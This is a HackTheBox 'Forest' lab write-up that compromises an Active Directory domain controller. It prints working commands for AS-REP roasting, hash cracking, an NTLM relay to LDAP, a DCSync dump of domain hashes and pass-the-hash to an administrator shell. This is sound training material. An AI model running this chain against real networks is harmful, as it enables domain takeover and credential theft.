Htb Forest Writeup
HackTheBox Forest Writeup
Overview
As a general overview this box provided me with an oppertunity to explore some common exploits using user account misconfiguration and NTLM Relay attacks whilst reinforcing my prior knowledge using tools like nmap and enum4linux.
Information Gathering
We start by running nmap to get an overview of the ports open on the system.
> nmap -sC -sV 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-09 06:40 EST
Nmap scan report for 10.10.10.161
Host is up (0.40s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-09 11:49:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/9%Time=5E171167%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h48m00s, deviation: 4h37m10s, median: 7m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-01-09T03:51:55-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-09T11:51:54
|_ start_date: 2020-01-09T11:18:57
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 353.01 seconds
Looking at our initial scan we discover that this machine is running active directory. This is obvious as there are many common active directory services running such as kerberos on port 88, RPC on port 135, Netbios session service on port 139 and LDAP on port 389.
For future reference, kerberos is an authorization technology used by Windows to authenticate users to provide better system security. The general idea of kerberos is that the user will request an authentication ticket (TGT) from the domain controller where the user credentials will be validated before an encrypted TGT is returned. The user stores the TGT and when the session expires, another will be requested. The TGT is then used to request access to a service by sending TGT along with the service principle name to the domain controller to again be verified. If valid the domain controller will send back a valid session key that can be presented to a service to gain access.
Continuing on with enumeration we can run Enum4linux. Enum4linux is a tool used for enumerating information from windows systems and can retrieve information such as password policies, user names, group memberships and domain information.
> enum4linux -a 10.10.10.161
The -a flag in this command means “all enumeration,” This outputs a huge amount of text so I won’t include the output here however looking through the results we are able to find a list of users on the system.
Administrator
Guest
krbtgt]
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
gilberte
J.Robinson
Getting User
A list of users on the machine opens up a huge amount of possibilities for attacks that can be performed. From general reading a few days before attempting this box I had come across a blog post by harmj0y about AS-REP Roasting which you can view here. This attack relies on the “Do not require Kerberos preauthentication” setting being enabled on a user account.
Referring back to the information about kerberos covered in the enumeration stage, this setting enables the attacker to request this TGT and no authentication is required.
To attempt to exploit this misconfiguration I started by looking for a tool within the impacket library. The impacket library is a collection of python classes for working with network protocols and contains a variety of categories including kerberos, windows secrets, MiTM Attacks, WMI and SMB.
As the misconfiguration is related to the granting of tickets we know that this is going to be a kerberos attack. Looking through this list of the different python classes we can see the GetNPUsers.py file which will attempt to get TGTs for users that have the “Do not require kerberos preauthentication” property set.
> ./GetNPUsers.py FOREST.htb.local/<user> -no-pass -dc-ip 10.10.10.161
I ran this command with each discovered username until I was finally given a hash for the user svc-alfresco.
$krb5asrep$23$svc-alfresco@HTB:e8bd5e316737b7a573591b64af83792f$2aafb1de402e03dd15f163dc9ca176b168318cdfeb47a1bf367b606147b0c5521267d76f0ae3aca9e40a8ad70318150e4a670c13b713e75a3e8a000e66d93d10640cc7cad1372f1c4d6ef66e783197316bba7ab2deadfb689ace101fadb8d38ad5bf9c212ee1097bc80a95435be320b63937233c0e84ac66b8f200499c525833fc29de3c85c7e7733a347de036670dd3dd3acc1b61cdd96c97fe26be56c5d8819b4b78e12e260f0f17ab1630e5996e70e8d2a36b43c539fe9252e3f16f375091bae928a9acab44d929fcf78f6afaa81edb12de1b1dac436f92a5847525e233ae
I could then run john to crack this hash and get the password which was “s3rvice”.
> john svc-alfrescoHash.txt
The final step was to now use these credentials to gain a shell in the system. As we discovered earlier in the nmap scan, port 5985 is open which is the remote management service. A quick google search reveals evil-winrm which will allow you to get a shell using valid credentials.
> ./evil-winrm.rb -i 10.10.10.161 -u 'htb\svc-alfresco' -p 's3rvice'
You can now access user.txt in the Desktop folder of svc-alfresco.
Elevating Privileges Part 1
Now that I had a user account I started my enumeration by looking at local group permissions.
> net groups
Group Accounts for \\
-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.
Starting with net groups we are given a list of groups which we can do further research into.
Whilst researching these I found a blog post about an NTLM Relay attack which required a user with the Exchange Windows Permissions group. Before we can do this however we need a user that is in that group.
Using the following command we can see that svc-alfresco isn’t currently part of the Exchange windows group, so we need to try to find a way to add them to it.
> net user /domain svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/20/2020 11:14:45 PM
Password expires Never
Password changeable 3/21/2020 11:14:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2019 4:09:47 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Service Accounts
The command completed successfully.
We can add svc-alfresco to the group using the following command.
> net group "Exchange Windows Permissions" svc-alfresco /ADD
The command completed successfully.
Going back to look at svc-alfresco’s groups again we can see that it has been added.
> net user /domain svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/20/2020 11:14:45 PM
Password expires Never
Password changeable 3/21/2020 11:14:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2019 4:09:47 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.
Elevating Privileges Part 2
Looking at this blog post we can see that we first need to run the ntlmrelayx.py script.
We can run this with
> ./ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
-t is used to specify the target which is the ldap protocol of the machine at ip 10.10.10.161. Rather than create a new user to do this we use –escalate-user so that it will use the existing user.
With this running we can then open the http server which is used to authenticate. For this task we use privexchange.py.
> ./privexchange.py -ah 10.10.14.27 10.10.10.161 -u 'svc-alfresco' -d htb.local
Password:
INFO: Using attacker URL: http://10.10.14.231/privexchange/
Traceback (most recent call last):
File "privexchange.py", line 225, in <module>
main()
File "privexchange.py", line 140, in main
session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
File "/usr/lib/python2.7/httplib.py", line 1069, in request self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 1109, in _send_request self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 1065, in endheaders self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 892, in _send_output self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 854, in send self.connect()
File "/usr/lib/python2.7/httplib.py", line 1282, in connect HTTPConnection.connect(self)
File "/usr/lib/python2.7/httplib.py", line 831, in connect self.timeout, self.source_address)
File "/usr/lib/python2.7/socket.py", line 575, in create_connection raise err
socket.error: [Errno 111] Connection refused
You don’t need to worry about the errors shown the program is still going to work.
We then navigate to http://localhost/privexchange and use svc-alfresco’s credentials.
If you now look back to the terminal where you executed the ntlmrelayx command it should show an incomming connection.
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20200109-211420.restore
Getting Root
svc-alfresco now has elevated privileges and so going back to impacket we can use the secretsdump,py script to dump all users including the administrator hashes.
> ./secretsdump.py htb.local/svcalfresco@10.10.10.161 -just-dc
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-
VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svcalfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:a19bb00ce4342a7fb668b0c2028ab9a9:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
We use the -just-dc flag so that the program only targets the domain controller.
Here at the top we have the administrators hash that we can attempt to crack.
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Cracking this hash fails, so we need to use it another way.
From prior reading I had read that rather than cracking hashes you can relay them on to the system in place of the password. I found a tool to do this in impacket by the name of wmiexec.
Running wmiexec returned a CMD shell with full administrator privileges.
> ./wmiexec.py htb/administrator@10.10.10.161 -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
You can now access root.txt in the Desktop folder of administrator.